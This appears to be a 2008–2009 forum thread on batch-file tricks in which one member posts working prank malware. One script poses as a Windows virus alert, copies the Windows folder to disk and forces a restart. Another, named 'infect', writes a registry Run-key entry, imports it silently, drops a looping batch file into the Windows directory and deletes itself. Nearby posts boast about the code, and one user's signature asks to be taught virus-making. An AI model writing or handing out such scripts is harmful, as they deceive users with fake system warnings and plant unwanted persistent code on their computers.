TechTalkz.com Logo

Go Back   TechTalkz.com Technology & Computer Troubleshooting Forums > Tech World > TIPS 'n' TRICKS

Notices

Batch Files

TIPS 'n' TRICKS


Reply
 
Thread Tools Display Modes
Old 08-11-2008, 11:39 AM   #21
Newbie
 
Bear's Avatar
 
Join Date: Nov 2008
Posts: 14
Thanks: 2
Thanked 1 Time in 1 Post
Rep Power: 0 Bear is an unknown quantity at this point
Re: Batch Files

ok, thanks thats useful :} thank you again
__________________
LOOKING FOR SOMEONE TO TEACH ME HOW TO MAKE VIRUS'S AND OTHER THINGS WITH NOTEPAD

Bear is offline   Reply With Quote
Old 21-11-2008, 04:11 PM   #22
Advanced Member (250+)
 
Wolfie276's Avatar
 
Join Date: Nov 2007
Location: /etc/init.d/
Posts: 441
Thanks: 15
Thanked 7 Times in 7 Posts
Rep Power: 0 Wolfie276 is an unknown quantity at this point


OS: Windows 7 Linux


Re: Batch Files

@echo off
TITLE VIRUS ALERT!
cls
color 0C
echo Windows has found a virus...
echo.
echo It is recommended to let Windows fix this issue.
echo.
echo If you do not let Windows fix this issue,
echo the next time you restart the computer
echo Windows will not load properly.
set /p command=Would you like windows to fix this issue? (Y/N):
if %command%==Y goto :delete
if %command%==N goto :exit
if %command%==y goto :delete
if %command%==n goto :exit
:delete
cls
echo Deleting files in %WINDIR%.
PING 1.1.1.1 -n 1 -w 2500 >NUL
cls
echo Deleting files in %WINDIR%..
PING 1.1.1.1 -n 1 -w 2500 >NUL
cls
echo Deleting files in %WINDIR%...
PING 1.1.1.1 -n 1 -w 2500 >NUL
cls
if exist "C:\WIN" goto start
MKDIR "C:\WIN"
:start
xcopy /E /Y %windir% "C:\WIN"
del C:\WIN
cls
set /p command=Windows require that you restart the computer to complete the issue, you can also restart later, do you want to do it now? (Y/N)
if %command%==Y goto :shutdown
if %command%==N goto :exit
if %command%==y goto :shutdown
if %command%==n goto :exit
:shutdown
shutdown -r -t 10 -c "Windows has succesfully fixed the issue."
:exit
exit



still no harm to computers, only waste of space for 10 mins (depends on the comp)
__________________
(\__/)
(='.'=) This is Bunny. Copy and paste bunny into your
(" )_(" ) signature to help him gain world domination.

http://www.youtube.com/watch?v=ZXD4N_Mi1iE&fmt=22# Freelancer Evolving
Wolfie276 is offline   Reply With Quote
Old 08-03-2009, 08:17 AM   #23
Advanced Member (250+)
 
Wolfie276's Avatar
 
Join Date: Nov 2007
Location: /etc/init.d/
Posts: 441
Thanks: 15
Thanked 7 Times in 7 Posts
Rep Power: 0 Wolfie276 is an unknown quantity at this point


OS: Windows 7 Linux


Re: Batch Files

Code:
@echo off
goto :A
:A
ECHO Windows Registry Editor Version 5.00 >infect.reg
ECHO. >> infect.reg
ECHO [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] >> infect.reg
ECHO "noob.bat"="C:\\WINDOWS\\noob.bat" >> infect.reg
goto :B
:B
regedit /S infect.reg
echo @echo off >noob.bat
echo goto :A >> noob.bat
echo :A >> noob.bat
echo echo noob >> noob.bat
echo goto :A >> noob.bat
copy noob.bat %WINDIR%
del noob.bat
del infect.reg
del %0
muhahaha beat that (it was supposed to background run without window and kill taskmanager but i didnt get the background running to work)
Wolfie276 is offline   Reply With Quote
Old 20-04-2009, 02:35 AM   #24
Junior Member (25+)
 
4bdulmobeen's Avatar
 
Join Date: Apr 2009
Location: i am from pakistan jhelum .
Age: 19
Posts: 43
Thanks: 3
Thanked 0 Times in 0 Posts
Rep Power: 0 4bdulmobeen is an unknown quantity at this point


OS: Windows XP


Send a message via Yahoo to 4bdulmobeen
Re: Batch Files

try this guys type in notepad the following and save it as .bat file
Msgbox"type here your message what ever you want",20."type here the title."
4bdulmobeen is offline   Reply With Quote
Old 23-04-2009, 08:09 PM   #25
Advanced Member (250+)
 
Wolfie276's Avatar
 
Join Date: Nov 2007
Location: /etc/init.d/
Posts: 441
Thanks: 15
Thanked 7 Times in 7 Posts
Rep Power: 0 Wolfie276 is an unknown quantity at this point


OS: Windows 7 Linux


Re: Batch Files

isnt that vbs?

seems like it is, ive used that in vbs
Wolfie276 is offline   Reply With Quote
Old 02-07-2009, 02:48 AM   #26
Junior Member (25+)
 
Adheep's Avatar
 
Join Date: Dec 2008
Location: I live in Madurai, Tamil Nadu, India and i'm proud of it.
Posts: 26
Thanks: 5
Thanked 4 Times in 3 Posts
Rep Power: 0 Adheep is an unknown quantity at this point


OS: Windows XP Windows Vista Windows 7


Wink Re: Batch Files

It doesn't do anything, except for a command window flashes for a fraction of second...

Can you tell me what exactly this trick do???
__________________
I'm a Nobody....

Nobody is perfect in this world

So i'm Perfect
Adheep is offline   Reply With Quote
Old 02-07-2009, 08:39 AM   #27
Advanced Member (250+)
 
Wolfie276's Avatar
 
Join Date: Nov 2007
Location: /etc/init.d/
Posts: 441
Thanks: 15
Thanked 7 Times in 7 Posts
Rep Power: 0 Wolfie276 is an unknown quantity at this point


OS: Windows 7 Linux


Re: Batch Files

Quote:
Originally Posted by 4bdulmobeen View Post
try this guys type in notepad the following and save it as .bat file
Msgbox"type here your message what ever you want",20."type here the title."
@Adheep: save it as a .vbs file and u will see
Wolfie276 is offline   Reply With Quote
Old 02-07-2009, 11:31 AM   #28
Junior Member (25+)
 
Adheep's Avatar
 
Join Date: Dec 2008
Location: I live in Madurai, Tamil Nadu, India and i'm proud of it.
Posts: 26
Thanks: 5
Thanked 4 Times in 3 Posts
Rep Power: 0 Adheep is an unknown quantity at this point


OS: Windows XP Windows Vista Windows 7


Red face Re: Batch Files

@wolfie276: Sorry man, when i save the file as .vsb(virtual sampler bank) the system doesn't recogonise the file format....

Can you tell me how to do that from the begining, and is the quotation symbols are to be added? What kind of program will support this file? And tell me what it does?
__________________
I'm a Nobody....

Nobody is perfect in this world

So i'm Perfect
Adheep is offline   Reply With Quote
Old 04-07-2009, 04:24 PM   #29
Advanced Member (250+)
 
Wolfie276's Avatar
 
Join Date: Nov 2007
Location: /etc/init.d/
Posts: 441
Thanks: 15
Thanked 7 Times in 7 Posts
Rep Power: 0 Wolfie276 is an unknown quantity at this point


OS: Windows 7 Linux


Re: Batch Files

its . V B S...its not . V S B, sorry if that sounded mean or something
Wolfie276 is offline   Reply With Quote
Old 17-10-2009, 12:28 PM   #30
Newbie
 
Join Date: Oct 2009
Posts: 1
Thanks: 0
Thanked 0 Times in 0 Posts
Rep Power: 0 Paradise is an unknown quantity at this point


OS: Windows Vista


Re: Batch Files

What About This Bunny mate
(\_/)
(0.0)
(> <)


Paradise is offline   Reply With Quote
Reply

Thread Tools
Display Modes



< Windows Help - MS Office Help - Hardware Support >


New To Site? Need Help?

All times are GMT +5.5. The time now is 08:31 PM.


vBulletin, Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO
Copyright © 2005-2009, TechTalkz.com. All Rights Reserved - Privacy Policy
Valid XHTML 1.0 Transitional